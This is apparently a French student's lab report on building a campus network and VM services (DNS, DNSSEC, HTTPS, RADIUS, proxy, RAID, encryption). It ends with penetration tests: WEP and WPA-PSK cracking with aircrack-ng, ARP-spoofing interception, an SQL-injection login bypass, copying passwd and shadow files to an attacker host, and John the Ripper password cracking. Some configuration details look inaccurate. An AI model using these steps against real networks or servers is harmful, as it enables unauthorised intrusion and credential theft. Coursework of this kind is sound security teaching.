SE2A5-AP2(config-subif)#exit
SE2A5-AP2(config)#interface dot11radio 0
SE2A5-AP2(config-if)#no shutdown
SE2A5-AP2(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip
SE2A5-AP2(config-if)#mbssid
SE2A5-AP2(config-if)#ssid DEMINEUR2
SE2A5-AP2(config-if)#exit

Machine virtuelle sur le serveur Capbreton

Création de la machine virtuelle

  • Connexion au serveur Capbreton :
ssh capbreton.plil.info
  • Créer la variable d’environnement http_proxy :
export http_proxy=http://proxy.plil.fr:3128

En configurant correctement le proxy de la plateforme, il est désormais possible d’accéder aux images et aux paquets Debian pour créer la VM.

  • Création d’une image pour la VM :
xen-create-image --hostname=demineur --ip=10.60.100.164 --gateway=10.60.100.254 --netmask=255.255.255.0 --dir=/usr/local/xen --password=glopglop --dist=buster

    → Dossier de stockage des données de la VM : /usr/local/xen/domains/demineur
    → Fichier de configuration de la VM : /etc/xen/demineur.cfg

  • Création des partitions virtuelles :
vgcreate virtual /dev/sda7
lvcreate -L10G -n demineur-home virtual
lvcreate -L10G -n demineur-var virtual
  • Vérification des partitions :
lvdisplay
lsblk
  • Formatage de la partition virtuelle :
mkfs.ext4 /dev/virtual/demineur-home
mkfs.ext4 /dev/virtual/demineur-var
  • Modification de /etc/xen/demineur.cfg :

    → Ajout des partitions virtuelles dans la variable disk :

'phy:/dev/virtual/demineur-home,xvda3,w',
'phy:/dev/virtual/demineur-var,xvda4,w'

    → Ajout du pont dans dans la variable vif :

vif = [ 'mac=00:16:3E:D8:97:68, bridge=IMA2a5' ]

Le fichier de configuration obtenu est le suivant :

#
# Configuration file for the Xen instance demineur, created
# by xen-tools 4.8 on Fri Nov 12 08:53:11 2021.
#

#
#  Kernel + memory size
#
kernel      = '/boot/vmlinuz-4.19.0-9-amd64'
extra       = 'elevator=noop'
ramdisk     = '/boot/initrd.img-4.19.0-9-amd64'

vcpus       = '1'
memory      = '256'


#
#  Disk device(s).
#
root        = '/dev/xvda2 ro'
disk        = [
                  'file:/usr/local/xen/domains/demineur/disk.img,xvda2,w',
                  'file:/usr/local/xen/domains/demineur/swap.img,xvda1,w',
                  'phy:/dev/virtual/demineur-home,xvda3,w',
                  'phy:/dev/virtual/demineur-var,xvda4,w'
              ]


#
#  Physical volumes
#


#
#  Hostname
#
name        = 'demineur'

#
#  Networking
#
vif         = [ 'mac=00:16:3E:BE:BF:2D, bridge=IMA2a5' ]

#
#  Behaviour
#
on_poweroff = 'destroy'
on_reboot   = 'restart'
on_crash    = 'restart'
  • Création de la VM :
xl create /etc/xen/demineur.cfg
  • Affichage de l’état des VM :
xl list
  • Affichage du mot de passe de la VM :
tail -f /var/log/xen-tools/demineur.log
  • Démarrage d’un shell sur la VM :
xen console demineur
  • Changement du mot de passe :
passwd root
  • Mise à jour de la liste des paquets :
apt update
  • Montage des partitions virtuelles :
mount /dev/xvda4 /mnt
  • Copie des données des répertoires /home et /var :
mv /var/* /mnt
  • Démontage des partitions virtuelles :
umount /mnt
  • Ajout des partitions au fichier /etc/fstab :
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

Serveur SSH

  • Modification du fichier /etc/ssh/sshd_config :
PermitRootLogin yes

Configuration IP

  • Modification du fichier /etc/network/interfaces :
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet6 auto
iface eth0 inet static
    address 10.60.100.164/24
    up ip address add dev eth0 193.48.57.164/32
    up ip route add default via 10.60.100.254 src 193.48.57.164
    down ip address del dev eth0 193.48.57.164/32
    down ip route del default via 10.60.100.254 src 193.48.57.164

Serveur DNS

Dans un premier temps, on utilise le registrar Gandi afin de réserver le nom de domaine demineur.site.
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :
  → Ajouter le Glue Record vers 193.48.57.164 afin d’associer le nom de domaine demineur.site à l’adresse IP 193.48.57.164
  → Modifier les serveurs de noms pour utiliser ns.demineur.site et ns6.gandi.net
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :
  → Modifier l’enrgistrement DNS @-A avec la valeur 193.48.57.193
  → Ajouter l’enrgistrement DNS ns-A avec la valeur 193.48.57.193
  → Modifier l’enrgistrement DNS www-CNAME avec la valeur ns.demineur.site.

  • Installation du paquet bind9
apt install bind9
  • Modification du fichier /etc/resolv.conf :
nameserver 127.0.0.1
  • Modification du fichier /etc/bind/named.conf.local :
zone "demineur.site" {
    type master;
    file "/etc/bind/db.demineur.site";
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};
  • Modification du fichier /etc/bind/named.conf.options :
options{
  directory "/var/cache/bind";
  forwarders {
    8.8.8.8;
    4.4.2.2;
  };
  dnssec-validation auto;
  listen-on-v6 { any; };
  allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
  217.70.177.40/32;
};
  • Créer le fichier BIND pour demineur.site :
cp /etc/bind/db.local /etc/bind/db.demineur.site
  • Modification du fichier /etc/bind/db.demineur.site :
;
; BIND data file for demineur.site
;
$TTL    604800
@       IN      SOA     ns.demineur.site. root.demineur.site. (
                              1         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@   IN  NS  ns.demineur.site.
@   IN  NS  ns6.gandi.net.
@   IN  A   193.48.57.164
NS  IN  A   193.48.57.164
NS  IN  AAAA    2001:7A8:116E:60A4::1
WWW IN  CNAME   NS
SSH IN  CNAME   NS
  • Redémarrage du service bind9 :
service bind9 restart

Tester DNS :

  • Modification du fichier /etc/resolv.conf
nameserver 193.48.57.164
  • Vérification de la traduction du nom de domaine demineur.site :
nslookup demineur.site

Serveur Web

  • Installation du paquet openssl :
apt install openssl
  • Création d’un certificat TSL :
openssl req -nodes -newkey rsa:2048 -sha256 -keyout demineur.site.key -out demineur.site.csr

Attention à bien renseigner demineur.site comme CN (Common Name) pour la création du certificat.

mv demineur.site.key /etc/ssl/private
mv demineur.site.csr /etc/ssl/certs

Il est nécessaire de faire signer le certificat .csr par un registrar tel que Let’s Encrypt ou Gandi afin d’en obtenir le nouveau certificat signé .crt.
Puisque le registrar Gandi a été utilisé pour réserver le nom de domaine demineur.site, il est alors possible d’utiliser à nouveau ce service pour signer gratuitement le certificat demineur.site.csr.

Pour cela, il faut “acheter” un certificat SSL pour un hôte “ailleurs” et coller le contenu du fichier .csr. Une fois le CN entré et reconnu, l’achat devient gratuit et peut être effectué.
Après quelques minutes, il est désormais possible de télécharger le certificat signé .crt ainsi que le certificat nommé GandiStandardSSLCA2.pem.

Ces deux certificats sont à copier dans le répertoire /etc/ssl/certs de la VM.

  • Copier les certificats sur la VM :
scp -r -p demineur.site.crt root@193.48.57.164:/etc/ssl/certs
scp -r -p GandiStandardSSLCA2.pem root@193.48.57.164:/etc/ssl/certs
  • Installation du paquet apache2 :
apt install apache2
  • Activation du module SSL :
a2enmod ssl
  • Modification du fichier /etc/apache2/ports.conf :
Listen 80

<IfModule mod_ssl.c>
   Listen 443
</IfModule>
<IfModule mod_gnutls.c>
   Listen 443
</IfModule>
  • Ajout du fichier /etc/apache2/sites-available/000-demineur.site-ssl.conf :
<IfModule mod_ssl.c>
        <VirtualHost 193.48.57.164:443>
                ServerName demineur.site
                ServerAlias ns.demineur.site www.demineur.site
                DocumentRoot /var/www/demineur.site/
                CustomLog /var/log/apache2/secure_access.log combined
                SSLEngine on
                SSLCertificateFile /etc/ssl/certs/demineur.site.crt
                SSLCertificateKeyFile /etc/ssl/private/demineur.site.key
                SSLCACertificateFile /etc/ssl/certs/GandiStandardSSLCA2.pem
                SSLVerifyClient None
        </VirtualHost>
</IfModule>
  • Activation du site demineur.site :
a2ensite 000-demineur.site-ssl
  • Modification du fichier nano /etc/apache2/apache2.conf :
ServerName demineur.site
  • Modification du fichier nano /etc/apache2/sites-available/000-default.conf :
Redirect permanent / https://www.demineur.site/
  • Redémarrage du service apache2 :
service apache2 restart

Configuration DNSSEC

  • Modification du fichier /etc/bind/named.conf.options :
dnssec-enable yes;
dnssec-validation yes;
dnssec-lookaside auto;
  • Création du répertoire demineur.site.dnssec :
mkdir /etc/bind/demineur.site.dnssec/
cd /etc/bind/demineur.site.dnssec/
  • Génération de la clef asymétrique de signature de clefs de zone :
dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE demineur.site
mv Kdemineur.site.*.key demineur.site-ksk.key
mv Kdemineur.site.*.private demineur.site-ksk.private
  • Génération de la clef asymétrique de signature des enregistrements :
dnssec-keygen -a RSASHA256 -b 2048 -n ZONE demineur.site
mv Kdemineur.site.*.key demineur.site-zsk.key
mv Kdemineur.site.*.private demineur.site-zsk.private
  • Modification du fichier /etc/bind/db.demineur.site :
$include "/etc/bind/demineur.site.dnssec/demineur.site-ksk.key"
$include "/etc/bind/demineur.site.dnssec/demineur.site-zsk.key"
  • Signature des enregistrements de la zone :
dnssec-signzone -o demineur.site -k demineur.site-ksk ../db.demineur.site demineur.site-zsk
  • Modification du fichier /etc/bind/named.conf.local :
zone "demineur.site" {
    type master;
    file "/etc/bind/db.demineur.site.signed";
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};

Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier demineur.site-ksk.key) à Gandi.
L’algorithme utilisé est le 5 (RSA/SHA-1).

Vérification :

cd /etc/bind/
dnssec-verify -o demineur.site db.demineur.site.signed
service bind9 restart

Configuration du serveur RADIUS

Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).

  • Installer le paquet freeradius :
apt install freeradius
  • Modifier le fichier /etc/freeradius/clients.conf :
client PA1 {
        ipaddr  = 10.60.101.1
        secret  = glopglop
}

client PA2 {
        ipaddr  = 10.60.101.2
        secret  = glopglop
}
  • Ajouter un utilisateur en modifiant le fichier /etc/freeradius/3.0/users :
pifou Cleartext-Password := "pasglop"
  • Modifier le fichier /etc/freeradius/3.0/mods-enables/eap :
eap {
  default_eap_type = peap
  ...
}
  • Arrêter le service freeradius durant la phase de tests :
service freeradius stop
  • Démarrer freeradius en mode debug :
freeradius -X

Pendant que freeradius est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.

  • Redémarrer le service freeradius :
service freeradius start

Configuration de Squid (serveur mandataire)

Pour permettre aux utilisateurs connectés aux réseaux Wifi d’avoir un accès à Internet, on configure un serveur mandataire (proxy).

  • Installer le paquet squid :
apt install squid
  • Faire une sauvegarde de la configuration de squid :
cp /etc/squid/squid.conf /etc/squid/squid.conf.bak
  • Nettoyer le fichier de configuration de squid en retirant les commentaires :
grep -vE "^#|^$" /etc/squid/squid.conf.bak > /etc/squid/squid.conf
  • Modifier le fichier de configuration de squid :
vi /etc/squid/squid.conf
  • Ajouter en dessous de la ligne acl localhost src une liste d’accès pour autoriser le réseau privé à utiliser le proxy :
acl allowedips src 10.60.164.0/24
  • Ajouter la ligne suivante en dessous de la ligne http_access allow localhost :
http_access allow allowedips
  • Configurer le nom de la machine :
visible_hostname demineur
  • Ne pas inclure l’adresse IP dans les requêtes HTTP :
forwarded_for off
  • Sauvegarder et quitter le fichier de configuration
  • Redémarrage du service squid :
service squid restart

Sécurisation des données

Afin de sécuriser les données, on configure un RAID5 avec les trois partition LVM de 1Go créées précédemment.

  • Installer les paquets nécessaires :
apt install mdadm
  • Créer les partitions virtuelles pour le RAID :
lvcreate -L1G -n demineur-raid-1 virtual
lvcreate -L1G -n demineur-raid-2 virtual
lvcreate -L1G -n demineur-raid-3 virtual
  • Ajouter les partitions à la configuration de la VM :
'phy:/dev/virtual/demineur-raid-1,xvdb1,w',
'phy:/dev/virtual/demineur-raid-2,xvdb2,w',
'phy:/dev/virtual/demineur-raid-3,xvdb3,w'
  • Créer le RAID5 à l’aide de la commande mdadm :
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3
  • Formater la partition RAID5 :
mkfs.ext4 /dev/md0
  • Ajout de la partition au fichier /etc/fstab :
/dev/md0 /media/raid ext4 defaults 0 1
  • On recharge les partitions afin de prendre en compte le RAID :
mount -a

Chiffrement des données

On connecte une clef USB sur laquelle on crée une partition chiffrée.

  • Installation des paquets nécessaires :
apt install lvm2 cryptsetup
  • Créer une partition sdb1 sur la clef USB sdb :
fdisk /dev/sdb

  → entrer n pour créer une nouvelle partition
  → entrer p pour créer une partition primaire
  → entrer le numéro de la partition
  → début de la partition : laisser par défaut
  → fin de la partition : laisser par défaut (prend tout l’espace disponible)
  → w pour ecrire

  • Informer le kernel que la table des partitions a changé :
partprobe
  • Initialisation du chiffrement LUKS de la partition :
cryptsetup create home /dev/sdb1 --type luks

Le chiffrement LUKS montre à l’utilisateur qu’il s’agit d’une partition chiffrée.
Il faut plutôt utiliser le chiffrement PLAIN qui permet de masquer ces informations.

cryptsetup create home /dev/sdb1 --type plain
  • Formatage de la partition :
cryptsetup open --type {plain|luks} /dev/sdb1 home
mkfs.ext4 /dev/mapper/home
cryptsetup close home

Tester le chiffrement :

  • Montage de la partition :
cryptsetup open --type {plain|luks} /dev/sdb1 home
mount /dev/mapper/home /mnt
  • Ajout de fichiers sur la clef :
echo "test" > /mnt/test
  • Démontage de la clef USB :
umount /mnt
cryptsetup close home

En reconnectant à nouveau la clef, on peut lire le fichier.

Ferme de serveurs Web

  • Installer Docker :
sudo apt install docker.io
  • Créer un fichier de configuration Dockerfile :
FROM httpd:latest
WORKDIR /usr/local/apache2/htdocs 
COPY src/ .
CMD [ "httpd", "-D", "FOREGROUND" ]
  • Récupérer l’image httpd via Docker Hub :
docker pull httpd
  • Créer l’image Docker :
docker build -t apache .
  • Créer un conteneur :
docker run -d --name apache apache

Tests d’intrusion

  • Passer en mode super-utilisateur :
su -

Le paramètre - permet de lire le fichier .bashrc de l’utilisateur root et d’ajouter le répertoire /sbin à la variable d’environnement PATH. Cela permet donc d’accéder aux multiples commandes du paquet aircrack-ng.

  • Installation des paquets nécessaires :
apt install aircrack-ng pciutils crunch

Cassage de clef WEP d’un point d’accès Wifi

  • Vérification du nom de la carte Wifi :
airmon-ng

La carte Wifi se nomme wlx40a5ef059e47.

  • Démarrer la carte Wifi en mode de surveillance (monitor mode) :
airmon-ng start wlx40a5ef059e47

Après activation du mode de surveillance, la carte Wifi se nomme wlan0mon.

airmon-ng start wlan0mon
  • Lancer une écoute de tous les paquets Wifi qui circulent afin de déterminer les paramètres du réseau Wifi à attaquer :
airodump-ng wlan0mon

Récupérer les informations suivantes :
  → BSSID - 04:DA:D2:9C:50:53
  → Canal - 3
  → SSID - cracotte04

  • Réaliser un test d’injection sur le point d’accès pour vérifier que la distance entre la carte Wifi et le point d’accès est suffisante :
aireplay-ng -9 -e cracotte04 -a 04:DA:D2:9C:50:53 wlan0mon

La commande doit retourner un pourcentage proche de 100% pour réaliser l’opération.

Il faut désormais lancer deux opérations en parallèle :
  → Cibler le point d’accès avec airodump-ng pour capturer les vecteurs d’initialisation nécessaires au cassage de la clef WEP
  → Associer la carte Wifi et le point d’accès avec aireplay-ng (réalisé par des cartes Raspberry Pi dans la salle de TP)

  • Récupérer les vecteurs d’initialisation (VI) pour l’algorithme de cassage :
airodump-ng -c 3 --bssid 04:DA:D2:9C:50:53 -w output wlan0mon

Les VI générés sont enregistrés dans les fichiers output*

  • Associer la carte Wifi et le point d’accès (relancer si la commande s’arrête) :
aireplay-ng -1 0 -e cracotte04 -a 04:DA:D2:9C:50:53 -h 40:a5:ef:05:9e:47 wlan0mon

Le paramètre -1 permet d’effectuer de fausses authentifications dont le délai entre les demandes est 0.
Pour cela, il est nécessaire de spécifier le BSSID de la carte Wifi utilisée pour le cassage.

Après un certain temps, un nombre suffisant de VI (entre 30k et 50k pour de ‘Data’ récupérées) a été capturé et la clef WEP peut alors être cassée à l’aide des fichiers output*.

  • Casser la clef WEP du point d’accès :
aircrack-ng -b 04:DA:D2:9C:50:53 output*.cap
KEY FOUND! [ 21:34:56:78:9A:BC:05:CB:A9:87:65:43:21 ] 
Decrypted correctly: 100%

Cassage du mot de passe WPA-PSK par force brute

  • Vérification du nom de la carte Wifi :
airmon-ng

La carte Wifi se nomme wlx40a5ef059e47.

  • Démarrer la carte Wifi en mode de surveillance (monitor mode) :
airmon-ng start wlx40a5ef059e47
airmon-ng start wlan0mon

Après activation du mode de surveillance, la carte Wifi se nomme wlan0mon.

  • Lancer une écoute de tous les paquets Wifi qui circulent afin de déterminer les paramètres du réseau Wifi à attaquer :
airodump-ng wlan0mon

Récupérer les informations suivantes :
  → BSSID - 44:AD:D9:5F:87:02
  → Canal - 3
  → SSID - kracotte03

  • Cibler la recherche vers le point d’accès pour capturer les VI générés par le PA :
airodump-ng -c 3 --bssid 44:AD:D9:5F:87:02 -w psk wlan0mon

Il est nécessaire de capturer les VI issus d’un handshake (émis lors de la connexion d’un utilisateur au PA).
Pour cela, des cartes Raspberry Pi présentes dans la salle de TP se connectent aux différents réseaux Wifi WPA.
Ici, les paquets récupérés sont stockés dans des fichiers psk*.

  • Créer un dictionnaire de toutes les combinaisons décimales possibles sur 8 bits :
crunch 8 8 0123456789 -o dictionnaire
  • Cassage de la PSK :
aircrack-ng -w dictionnaire -b 44:AD:D9:5F:87:02 psk*.cap
KEY FOUND! [ 90122222 ]
Master Key     : 2D 1E 30 8D AA 30 91 7A 5D AB B5 80 02 FB 16 3F 
                 9B DB 91 AC A5 76 4A 33 31 8B D3 7B AC 5A DB A7 

Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

EAPOL HMAC     : E6 17 FE C7 E3 14 F0 B9 68 99 97 86 07 41 DA E8

Attaque du type “homme du milieu” par usurpation ARP

Sur la machine qui effectue l’attaque :

  • Activer le routage IPv4 :
sysctl -w net.ipv4.ip_forward=1
  • Lancer l’empoisonnement du cache ARP de la victime :
arpspoof -i <Nom carte réseau> -t <Adresse IP victime> <Adresse IP passerelle>
  • Vérifier la contamination du cache ARP sur la machine de la victime :
ip n
  • Utiliser l’analyseur de réseau Wireshark (sniffer) pour visualiser le contenu des formulaires HTTP

Intrusion sur un serveur Web

Injection SQL :

  • Se rendre sur un site Web avec la chaîne ci-dessous comme identifiant et mot de passe :
' OR 1 = 1 --

Soit la requête ci-dessous :

SELECT * FROM USERS WHERE ID='$id' AND PWD='$pwd'

Ainsi, l’injection SQL permet de commenter la partie de la requête pour le mot de passe et d’effectuer un OU avec une condition toujours vraie afin de récupérer toutes les informations de la base de données :

SELECT * FROM USERS WHERE ID='' OR 1 = 1 --' AND PWD='' OR 1 = 1 --'

Accès à la base de données

  • Installation des paquets nécessaires :
apt-get install dirb
  • Analyse des fichiers du serveur Web :
dirb http://honey.plil.info

On remarque la présence du répertoire phpmyadmin sur le serveur.

Connexion au serveur

  • Installation des paquets nécessaires :
apt-get install nmap
  • Vérifier que le serveur est accessible à distance (analyse des ports) :
nmap -6 https://<Adresse du serveur>
  • Se connecter au serveur via ssh avec les identifiants récupérés dans la base de données :
ssh <Utilisateur>@<Adresse du serveur>
  • Récupération des informations sur les utilisateurs :
scp /etc/passwd <Utilisateur pirate>@<Adresse machine pirate>:~/passwd
scp /etc/shadow <Utilisateur pirate>@<Adresse machine pirate>:~/shadow

Cassage du mot de passe root

  • Utilisation des commandes de l’utilitaire de John the Ripper.
unshadow ./passwd ./shadow | grep root > pass
  • Création d’un dictionnaire (on sait que le mot de passe est la répétition d’un mot de 4 lettres deux fois) :
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico
sed -i 's/\(.*\)/\1\1/' dico
  • Cassage du mot de passe :
/usr/sbin/john -w:dico pass
  • Visualisation du mot de passe en clair après quelques minutes :
/usr/sbin/john --show pass

Résumé des séances

Jeudi 16/09/2021 10h-12h

Tâches effectuées :

  • Plan d’adressage
  • Architecture réseau
  • Câblage des fibres

Jeudi 23/09/2021 08h-12h

Tâches effectuées :

  • Câblage des câbles coaxiaux
  • Configuration de base des trois routeurs
  • Configuration du VLAN 530 sur les deux routeurs principaux
    • La communication avec le routeur en amont (192.168.222.33) est fonctionnelle
    • Le routeur répond correctement à la sollicitation ICMP par la commande PING

Vendredi 24/09/2021 08h-12h

Tâches effectuées :

  • Configuration du VLAN 110 sur les deux routeurs principaux
  • Configuration de OSPF
  • Configuration de VRRP pour déterminer le routeur actif sur le réseau
    • VRRP ne permet pas de choisir une adresse IP en dehors du sous-réseau déclaré
    • Le sous-réseau 10.60.100.0/24 est utilisé dans le VLAN 110 pour avoir davantage d’addresses et pour pouvoir utiliser VRRP
    • Ce sous-réseau n’est pas redistribué via OSPF

Jeudi 26/09/2021 08h-12h

Tâches effectuées :

  • Configuration des routeurs Cisco 9200 et 6509-E
    • Tests de connectivité avec Internet fonctionnels
      • L’implémentation du protocole NAT sur le Cisco 6509-E a été effectuée
      • Il a fallu ajouter la dernière adresse du réseau 193.48.57.160/28 sur l’interface loopback 0 afin d’activer la redistribution par OSPF
      • Les paquets ICMP et UDP sont correctement échangés mais pas ceux TCP
      • Le commutateur Cisco 9200 n’implémente pas le protocole NAT
      • La solution trouvée est de passer par des routes statiques
      • Sauf si une solution est trouvée, le routeur Cisco 6509-E implémentera également des routes statiques plutôt que d’utiliser le protocole NAT
  • Configuration IPv6
  • La redondance est fonctionnelle : Le commutateur Cisco 9200 prend le relais sur le routeur Cisco 6509-E si celui-ci ne fonctionne plus
  • Configuration des interfaces vers le routeur Cisco ISR 4331 et les points d’accès
  • Le routeur Cisco ISR 4331 sera connecté au commutateur SR52-pinfo-1 sur l’interface G0/39 (l’interface a été configuré pour commuter le VLAN 532)

Vendredi 12/11/2021 8h-12h

Tâches effectuées :

  • Configuration des routeurs Cisco 9200 et 6509-E
    • Installation fonctionnelle, il faut juste trouver une solution pour les paquets UDP filtrés avec NAT (cf. ACL)
    • Changement des adresses IP pour le VLAN 530 (et 532)
  • Début configuration ISR 4331
  • Création VM
    • Partitions virtuelles
    • Apache + SSL
    • DNS
    • RAID5

Jeudi 18/11/2021 08h-10h

Tâches effectuées :

  • Configuration de la VM
    • Configuration DNS avec Gandi fonctionnelle
    • Création du certificat SSL
    • Activation du site HTTPS

Vendredi 19/11/2021 08h-12h

Tâches effectuées :

  • Tests d’intrusion
    • Cassage de clef WEP
    • Cassage de clef WPA2
  • Configuration de freeradius et couplage au Wifi WPA-EAP
  • Configuration DNSSEC
  • Cassage de clef WEP et WPA2

Lundi 29/11/2021 08h-12h

Tâches effectuées :

  • Configuration IPv6
    • Communication fonctionnelle entre les réseaux créés et ceux de la plateforme maths/info
    • Communication impossible avec Internet (IPv6) à cause de la configuration des routeurs de l’université
  • Configuration ISR 4331
  • Configuration Wifi EAP
    • Adressage DHCP fonctionnel pour les appareils Wifi
    • Communication fonctionnelle entre les appareils Wifi connectés et les autres équipements
    • Configuration d’un serveur Proxy pour donner aux appareils Wifi un accès à Internet

Vendredi 03/12/2021 08h-10h

Tâches effectuées :

  • Examen